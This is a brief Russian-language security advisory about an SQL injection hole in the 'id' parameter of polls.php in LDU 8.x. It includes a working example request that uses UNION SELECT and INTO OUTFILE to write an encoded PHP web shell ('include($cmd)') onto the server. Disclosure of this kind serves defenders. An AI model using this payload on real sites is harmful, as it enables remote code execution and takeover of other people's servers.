Программа: LDU 8.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "id" сценарием polls.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

//polls.php?id=’union%20select%200,0,0,0,char(60,63, 105,110,99,108,117,100,101,40,36,99,109, 100,41,59,63,62)%20from%20 sed_users%20INTO%20OUTFILE%20′ [path]/.php’/*



Оставить мнение